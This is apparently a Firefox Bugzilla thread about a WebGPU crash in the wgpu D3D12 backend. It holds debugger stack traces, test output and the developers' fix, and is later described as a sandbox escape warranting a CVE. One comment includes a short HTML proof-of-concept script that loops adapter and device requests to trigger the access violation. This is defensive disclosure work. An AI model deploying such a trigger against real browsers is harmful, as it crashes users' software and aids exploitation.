00007ffd195b7d98 488b00 mov rax,qword ptr [rax] ds:00007ffd
c6945000=????????????????
3:081> k
Child-SP RetAddr Call Site
00 000000ba45858f00 00007ffd
195c0d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 000000ba45858f30 00007ffd
195c23d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 000000ba45859150 00007ffd
c9416a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 000000ba458591d0 00007ffd
c941668e d3d12!D3D12CreateDeviceImpl+0x5d
04 000000ba45859220 00007ffc
ddb1ee84 d3d12!D3D12CreateDevice+0xae
05 (Inline Function) ---------------- xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure$0+0x174 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 113] 06 (Inline Function) --------
-------- xul!core::ops::function::impls::impl$3::call_mut+0x174 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\ops\function.rs @ 298]
07 (Inline Function) ---------------- xul!core::iter::traits::iterator::Iterator::find_map::check::closure$0+0x174 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2795] 08 (Inline Function) --------
-------- xul!core::iter::traits::iterator::Iterator::try_fold+0x19b [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2299]
09 (Inline Function) ---------------- xul!core::iter::traits::iterator::Iterator::find_map+0x19b [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2801] 0a 000000ba
458592a0 00007ffcddb1eae4 xul!core::iter::adapters::filter_map::impl$2::next<wgpu_hal::ExposedAdapter<wgpu_hal::dx12::Api>,alloc::vec::into_iter::IntoIter<enum2$<d3d12::dxgi::DxgiAdapter>,alloc::alloc::Global>,wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure_env$0>+0x1c4 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\adapters\filter_map.rs @ 61] 0b (Inline Function) --------
-------- xul!alloc::vec::spec_from_iter_nested::impl$0::from_iter+0x5 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\spec_from_iter_nested.rs @ 26]
0c (Inline Function) ---------------- xul!alloc::vec::in_place_collect::impl$1::from_iter+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\in_place_collect.rs @ 167] 0d (Inline Function) --------
-------- xul!alloc::vec::impl$15::from_iter+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\mod.rs @ 2724]
0e (Inline Function) ---------------- xul!core::iter::traits::iterator::Iterator::collect+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 1891] 0f 000000ba
458595e0 00007ffcdd99a883 xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters+0x84 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 115] 10 000000ba
45859840 00007ffcd381951f xul!wgpu_bindings::server::wgpu_server_instance_request_adapter+0x1213 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 168] 11 000000ba
4585be70 00007ffcd38444c1 xul!mozilla::webgpu::WebGPUParent::RecvInstanceRequestAdapter+0x2df [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 288] 12 000000ba
4585c310 00007ffccff52a3b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x8461 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 661] 13 000000ba
4585e720 00007ffcceb69800 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x6ab [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 214] 14 000000ba
4585e9f0 00007ffcceb670f2 xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x150 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1811] 15 000000ba
4585ea60 00007ffcceb67f8e xul!mozilla::ipc::MessageChannel::DispatchMessage+0x552 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1736] 16 000000ba
4585ec80 00007ffcceb686f2 xul!mozilla::ipc::MessageChannel::RunMessage+0x30e [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1536] 17 000000ba
4585ed50 00007ffccd499f20 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x172 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1643] 18 000000ba
4585edc0 00007ffccd4aa1e2 xul!nsThread::ProcessNextEvent+0x1450 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1194] 19 000000ba
4585f380 00007ffcceb722fc xul!NS_ProcessNextEvent+0x172 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480] 1a 000000ba
4585f460 00007ffccea925b4 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x31c [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 1b (Inline Function) --------
-------- xul!MessageLoop::RunInternal+0x41 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370]
1c 000000ba4585f570 00007ffc
cea9237b xul!MessageLoop::RunHandler+0x94 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364]
1d 000000ba4585f5c0 00007ffc
cd49080f xul!MessageLoop::Run+0x1ab [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345]
1e 000000ba4585f6c0 00007ffc
fa0cada8 xul!nsThread::ThreadFunc+0x2ef [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393]
1f 000000ba4585fa40 00007ffc
fa0a389d nss3!_PR_NativeRunThread+0x438 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 399]
20 000000ba4585fb80 00007ffd
d9c39363 nss3!pr_root+0x2d [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140]
21 000000ba4585fbb0 00007ffc
fa4ab714 ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
22 000000ba4585fbe0 00007ffd
dbb726ad clang_rt_asan_dynamic_x86_64!__asan::AsanThread::ThreadStart+0x84 [/builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_thread.cpp @ 277]
23 000000ba4585fc30 00007ffd
22a445d4 KERNEL32!BaseThreadInitThunk+0x1d
24 (Inline Function) ---------------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x19 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 25 000000ba
4585fc60 00007ffddbfaa9f8 mozglue!patched_BaseThreadInitThunk+0x1f4 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 617] 26 000000ba
4585fd80 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Reporter | ||
Comment 36•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #26)
- One of the stack frames in the OP is named
D3D12ValidateAndCreateDevice
, which may imply a relationship to D3D12's validation layers. This might be important; validation layers are intended to change behavior for the sake of diagnostics, but they can also change behavior such that behavior that does not crash without them may crash while they are enabled.To start with this thread of discussion: :loobenyang, do you have any system configuration that alters the set of validation layers enabled for D3D12?
I don't have any special system configuration. I reproduced it on two different machines easily. So most likely it's NOT specific to one particular configuration.
Comment 37•2 years ago
|
||
ahale was able to repro: https://crash-stats.mozilla.org/report/index/09373667-be37-400a-b1c0-80c560230713
Comment 38•2 years ago
|
||
I was able to repro this crash on Firefox Nightly, attached the about:support.
Here's the crash I produced https://crash-stats.mozilla.org/report/index/09373667-be37-400a-b1c0-80c560230713
Comment 39•2 years ago
|
||
From what I've been able to determine, the browser has to be running, then hibernate the computer (suspend, aka sleep), then wake up the computer, then try loading the PoC, and then it triggers the crash. Doesn't seem to happen if an NVIDIA GPU is enabled, just Intel iGPU by itself.
Reporter | ||
Comment 40•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #33)
(In reply to Looben Yang from comment #30)
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old
wgpu-test
binary, running the code I provided) negative?I did not compile the code. I ran the binary only.
Just so we can compare apples-to-apples with what Firefox is currently consuming, let's run the code that uses
wgpu
0.16.0, like Firefox currently does. I've attached two ZIP archives containing compiled binaries of the source inwgpu-3485-mvre.zip
with different optimization levels (wgpu-3485-mvre-debug.exe.zip
andwgpu-3485-mvre-release.exe.zip
). Could you please run them, and let me know what the result is?BTW, I appreciate your patience. I know I'm asking you for a lot of bug repro attempts (and unfortunately, I don't see that changing soon). 😅 I wish that I had an environment in which I could reproduce this consistently, and attach a debugger.
I ran both wgpu-3485-mvre-release.exe and
wgpu-3485-mvre-debug.exe.zip` . I also called these executables from a script continuously, but NO Crash. The result of wgpu-3485-mvre-release:
Test A:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "NVIDIA",
driver_info: "517.00",
backend: Vulkan,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "Intel Corporation",
driver_info: "Intel driver",
backend: Vulkan,
}
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test B:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Assignee | ||
Comment 41•2 years ago
•
|
||
:loobenyang: I noticed that you haven't reported testing the wgpu-3485-mvre-v2-loops-and-threads
binaries. Could you please test those, too?
Assignee | ||
Comment 42•2 years ago
|
||
:loobenyang: After working with :ahale and :jrmuizel to analyze potential root causes in WGPU's D3D12 backend, we believe we may have a fix that addresses this issue. The fix enforces the use of strong reference counting for all APIs in the d3d12
crate, which the wgpu-core
crate consumes.
You may consume these tentative changes from CI builds that I made. :ahale has not been able to reproduce the issue on her machine(s) with this build, and we're cautiously optimistic that this might solve the issue in your environment as well:
- The set of CI jobs associated with my latest build can be found here: https://treeherder.mozilla.org/jobs?repo=try&revision=eff189309f751716a05773db8e54b03d4e001582&selectedTaskRun=VKMjiBlTR5CROokAfp2_bQ.0
- If you click on one of the build jobs (i.e., the jobs labeled with a green
B
), a bottom panel will show up with a tab calledArtifacts and Debugging Tools
. Once inside, you can download Firefox artifacts from them. In particular, you'll want thetarget.zip
files, which containfirefox.exe
and its dependencies.- For convenience, here are the direct
target.zip
links:Windows 2012 x64 debug
,Windows 2012 x64 opt
.
- For convenience, here are the direct
Could you please run these locally, and let me know if this issue still reproduces?
Reporter | ||
Comment 43•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #41)
:loobenyang: I noticed that you haven't reported testing the
wgpu-3485-mvre-v2-loops-and-threads
binaries. Could you please test those, too?
I just ran these two, did not see anything interesting. The last few lines of output of wgpu-3485-mvre-v2-loops-and-threads-release:
Test A:
AdapterInfo {
name: "Intel(R) UHD Graphics 630",
vendor: 0x8086,
device: 0x3E9B,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics 630",
vendor: 0x8086,
device: 0x3E9B,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test A:
Test A:
Test A:
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test A:
Test A:
Test B:
Reporter | ||
Comment 44•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #42)
:loobenyang: After working with :ahale and :jrmuizel to analyze potential root causes in WGPU's D3D12 backend, we believe we may have a fix that addresses this issue. The fix enforces the use of strong reference counting for all APIs in the
d3d12
crate, which thewgpu-core
crate consumes.You may consume these tentative changes from CI builds that I made. :ahale has not been able to reproduce the issue on her machine(s) with this build, and we're cautiously optimistic that this might solve the issue in your environment as well:
- The set of CI jobs associated with my latest build can be found here: https://treeherder.mozilla.org/jobs?repo=try&revision=eff189309f751716a05773db8e54b03d4e001582&selectedTaskRun=VKMjiBlTR5CROokAfp2_bQ.0
- If you click on one of the build jobs (i.e., the jobs labeled with a green
B
), a bottom panel will show up with a tab calledArtifacts and Debugging Tools
. Once inside, you can download Firefox artifacts from them. In particular, you'll want thetarget.zip
files, which containfirefox.exe
and its dependencies.
- For convenience, here are the direct
target.zip
links:Windows 2012 x64 debug
,Windows 2012 x64 opt
.Could you please run these locally, and let me know if this issue still reproduces?
I tried several times, but I could not reproduce it.
I ran the same test case InvalidFunPointer_wgpu_hal_PoC_adapter.html on the same machine. The result with this patched build and the official nightly build is:
official nightly - Reproduced
patched release - NOT reproduced
official nightly - Reproduced
patched release - NOT reproduced
official nightly - Reproduced
patched release - NOT reproduced
Assignee | ||
Comment 45•2 years ago
|
||
:loobenyang: Excellent! I'll prepare a patch to consume the changes more formally. We have an open upstream PR for the strong ref. changes at wgpu
#3936 now, and we expect that to be merged soon. Once that's happened, my patch will be ready to land.
Comment 46•2 years ago
|
||
wgpu#3936 is now merged into wgpu trunk. I've also backported it to the wgpu commit we are currently using in Mozilla Central; that backport is available as the branch use-d3d12-0.7.0
in github.com/gfx-rs/wgpu
.
If we can land Bug 1844012 quickly, then doing another import of commit 1161a22f from gfx-rs/wgpu
trunk is the way forward.
If Bug 1844012 does not land quickly, then we should do an import of the branch use-d3d12-0.7.0
from gfx-rs/wgpu
, which rebases our fix directly on the wgpu commit Mozilla Central is using now.
Assignee | ||
Comment 47•2 years ago
|
||
Bug 1844012 has had its scope changed to include consuming wgpu
#3936. It's now up for review at D183959, which I've approved (CC :nical). :nical has indicated that he intends to land at latest by tomorrow, waiting only for review from #supply-chain-reviewers
on D183958. If it is not reviewed by then, the current plan is to just land it anyway, since this is a high priority.
Assignee | ||
Comment 48•2 years ago
|
||
Bug 1844012's patches to use strong refcounting in wgpu-core
's D3D12 backend has landed! :loobenyang: Unless you can reproduce this issue in the latest Firefox Nightly, I believe we may now consider this issue closed. Please confirm, so that we may mark this bug as Resolved
.
Updated•2 years ago
|
Reporter | ||
Comment 49•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #48)
Bug 1844012's patches to use strong refcounting in
wgpu-core
's D3D12 backend has landed! :loobenyang: Unless you can reproduce this issue in the latest Firefox Nightly, I believe we may now consider this issue closed. Please confirm, so that we may mark this bug asResolved
.
I just did a comparison test again. I did not get it reproduced on latest nightly.
First, I disabled my WIFI, and ran InvalidFunPointer_wgpu_hal_PoC.html on my existing nightly build. It's reproduced easily:
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
117.0a1 (2023-07-18) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1992)
(41c4.3f14): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff996317d98 488b00 mov rax,qword ptr [rax] ds:00007ff9
e2ad5000=????????????????
0:095> r
rax=00007ff9e2ad5000 rbx=000000000000fad7 rcx=000001d3bc650e40
rdx=00000075abcacf20 rsi=000001d3bc651410 rdi=0000000000000000
rip=00007ff996317d98 rsp=00000075abcacb20 rbp=00000075abcacdd0
r8=00000075abcad060 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff9fe295108
r14=00000075abcad060 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff996317d98 488b00 mov rax,qword ptr [rax] ds:00007ff9
e2ad5000=????????????????
0:095> k
Child-SP RetAddr Call Site
00 00000075abcacb20 00007ff9
96320d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000075abcacb50 00007ff9
963223d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000075abcacd70 00007ff9
fe286a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000075abcacdf0 00007ff9
fe28668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000075abcace40 00007ff9
9f019e5b d3d12!D3D12CreateDevice+0xae
05 00000075abcacec0 00007ff9
9f04e0e0 xul!JOG_RegisterPing+0xa3badb
06 00000075abcad270 00007ff9
9ebbdb18 xul!JOG_RegisterPing+0xa6fd60
07 00000075abcad4f0 00007ff9
9cf9575e xul!JOG_RegisterPing+0x5df798
08 00000075abcaeca0 00007ff9
9cf9470c xul!VR_RuntimePath+0xa8357e
09 00000075abcaef90 00007ff9
9c4eb0bf xul!VR_RuntimePath+0xa8252c
0a 00000075abcaf140 00007ff9
9b551e79 xul!mozilla_dump_image+0xddcf
0b 00000075abcaf1e0 00007ff9
9b2182af xul!GIFFT_TimingDistributionCancel+0x8f7c89
0c 00000075abcaf550 00007ff9
9b21587e xul!GIFFT_TimingDistributionCancel+0x5be0bf
0d 00000075abcafa30 00007ff9
9a22fc8f xul!GIFFT_TimingDistributionCancel+0x5bb68e
0e 00000075abcafae0 00007ff9
9a0587fb xul!XRE_GetBootstrap+0x9ddc5f
0f 00000075abcafb30 00007ff9
a16b5885 xul!XRE_GetBootstrap+0x8067cb
10 00000075abcafd10 00007ff9
a1738b81 nss3!sqlite3_result_text+0xc55
11 00000075abcafd90 00007ffa
13119363 nss3!PR_MD_NOTIFY_CV+0xc1
12 00000075abcafdc0 00007ffa
142726ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
13 00000075abcafdf0 00007ff9
d5606218 KERNEL32!BaseThreadInitThunk+0x1d
14 00000075abcafe20 00007ffa
1562aa68 mozglue!mozilla::mscom::detail::EndProcessRuntimeInit+0x318
15 00000075abcafe90 00000000
00000000 ntdll!RtlUserThreadStart+0x28
Repeatedly reproduced for about 3 times, then I switched on WIFI. MY nightly got updated to 117.0a1 (2023-07-20) (64-bit). I could NOT reproduced it anymore with the same test case InvalidFunPointer_wgpu_hal_PoC.html.
Comment 50•2 years ago
|
||
(this was confirmed by ahale)
Assignee | ||
Updated•2 years ago
|
Updated•2 years ago
|
Updated•2 years ago
|
Comment 51•2 years ago
|
||
Since this was not in a shipping version of Firefox it would be awkward to issue a Firefox advisory for it, but we should give it a CVE and issue an advisory in the wgpu github advisory.
Comment 52•2 years ago
|
||
Looben: Thank you for your help and persistence with this bug. Since the GPU process is not sandboxed currently, this find counts as a Firefox sandbox escape. We're very grateful to be able to fix it before this was enabled for our users.
Erich: thank you, too, for your persistence in this bug that was hard to narrow down.
Updated•2 years ago
|
Updated•1 year ago
|
Updated•9 months ago
|
Description
•